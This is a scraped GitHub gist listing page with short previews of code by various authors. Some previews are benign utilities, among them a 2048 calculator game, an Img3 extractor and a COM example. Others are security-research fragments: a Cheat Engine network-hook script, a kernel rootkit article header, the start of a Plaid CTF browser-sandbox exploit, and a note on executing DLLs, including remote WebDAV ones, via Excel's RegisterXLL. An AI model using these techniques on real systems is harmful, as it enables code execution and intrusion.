Skip to content

Instantly share code, notes, and snippets.

View bb33bb's full-sized avatar
💭
I may be slow to respond.

boy1337 bb33bb

💭
I may be slow to respond.
485 followers · 569 following
View GitHub Profile
@Gozala
Gozala / html_iframe.js
Last active July 29, 2019 07:01
nesting frames
// Security Error: Content at about:srcdoc may not load or link to resource://jid1-pss5nuwzdn1n3a-at-jetpack/signals/data/index.html.
let XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
let HTML_NS = "http://www.w3.org/1999/xhtml";
let toolbar = document.createElementNS(XUL_NS, "toolbar");
toolbar.setAttribute("collapsed", false);
toolbar.setAttribute("style", "height: 80px;");
let toolbox = document.getElementById("navigator-toolbox");
@robb83
robb83 / ce_hook_network.lua
Last active June 13, 2022 07:47
Cheat Engine Scripts
-- Simple network hook script
addressOfSend = getAddress("WS2_32.send")
addressOfGetStatus1 = getAddress("Kernel32.GetQueuedCompletionStatus")
addressOfGetStatus2 = getAddress("Kernel32.GetQueuedCompletionStatusEx")
addressOfCreateIoCompletionPort = getAddress("Kernel32.CreateIoCompletionPort")
print(string.format("WS2_32.send = %x, Kernel32.GetQueuedCompletionStatus = %x, Kernel32.GetQueuedCompletionStatusEx = %x, Kernel32.CreateIoCompletionPort = %x", addressOfSend, addressOfGetStatus1, addressOfGetStatus2, addressOfCreateIoCompletionPort))
debug_removeBreakpoint(addressOfSend)
debug_removeBreakpoint(addressOfGetStatus1)
debug_removeBreakpoint(addressOfGetStatus2)
@alexprivalov
alexprivalov / Revisiting Mac OS X Kernel Rootkits
Created August 7, 2015 11:04
Title : Revisiting Mac OS X Kernel Rootkits
Author : fG!
Date : April 18, 2014
|=----------------------------------------------------------------------------=|
|=----------------=[ Revisiting Mac OS X Kernel Rootkits ]=-------------------=|
|=----------------------------------------------------------------------------=|
|=------------------------=[ fG! <[email protected]> ]=---------------------------=|
|=----------------------------------------------------------------------------=|
@sroettger
sroettger / js_sandbox.js
Created April 17, 2016 21:09
Exploit for the js_sandbox challenge of Plaid CTF 2016
with (true) {
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
function f(){
var x = 8;
var y = 0xffffffff;
var ind = x & y;
x = 16;
y = 0xffffffff;
var ind2 = ind + (x&y);
@Siguza
Siguza / t2048.c
Last active March 8, 2022 08:00
2048 for your calculator! :D
/*
* t2048.c - 2048 for some TI calculators
*
* Copyright (c) 2014 Siguza
*
* Tested on TI-89 Titanium only. According to headers, it should work on TI-92 and Voyage 200 as well, but no promises.
* To be compiled with ti-gcc - as far as I remember, TI's own C compiler can't handle this.
*
* Licensed under MIT, i.e. feel free to use and redistribute at will, but I'd appreciate some credit. :)
*/
@Siguza
Siguza / img3ex.c
Created September 18, 2016 14:07
Img3 extractor
/*
* img3ex.c - Extract Img3 files from any binary blob, e.g. a /dev/disk* dump.
*
* Placed in the Public Domain, do whatever you want with it. No warranty of any kind.
*
* Compile with: cc -o img3ex -std=c11 -Wall -O3 img3ex.c
*/
#include <errno.h> // errno
#include <fcntl.h> // open, O_RDONLY
@Alexhuszagh
Alexhuszagh / com.cpp
Last active June 26, 2022 01:21
Example Using COM IDispatch Interface
/** Example using the COM interface without AutoCOM. The entire
* file can be automated with AutoCOM in under 15-lines of code.
*
* #include "autocom.hpp"
* int main(int argc, char *argv[])
* {
* com::Bstr text;
* com::Dispatch dispatch("VBScript.RegExp");
* dispatch.put("Pattern", L"\\w+");
* for (auto match: dispatch.iter("Execute", L"A(b) c35 d_[x] yyy")) {
@Siguza
Siguza / build_libimobiledevice.sh
Last active April 22, 2021 23:38
Moved here: https://github.com/Siguza/ios-build/blob/master/libimobiledevice/build.sh
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@artynet
artynet / cross-compile-zlib-windows.sh
Last active July 15, 2021 03:19
Cross compile zLib for mingw32-w64
#!/bin/bash
# PREFIXDIR=$HOME/Programmi/Zlib-1.2.11-win32-x86
PREFIXDIR=$HOME/Programmi/win32-cross
make -f win32/Makefile.gcc BINARY_PATH=$PREFIXDIR/bin INCLUDE_PATH=$PREFIXDIR/include LIBRARY_PATH=$PREFIXDIR/lib SHARED_MODE=1 PREFIX=i686-w64-mingw32- install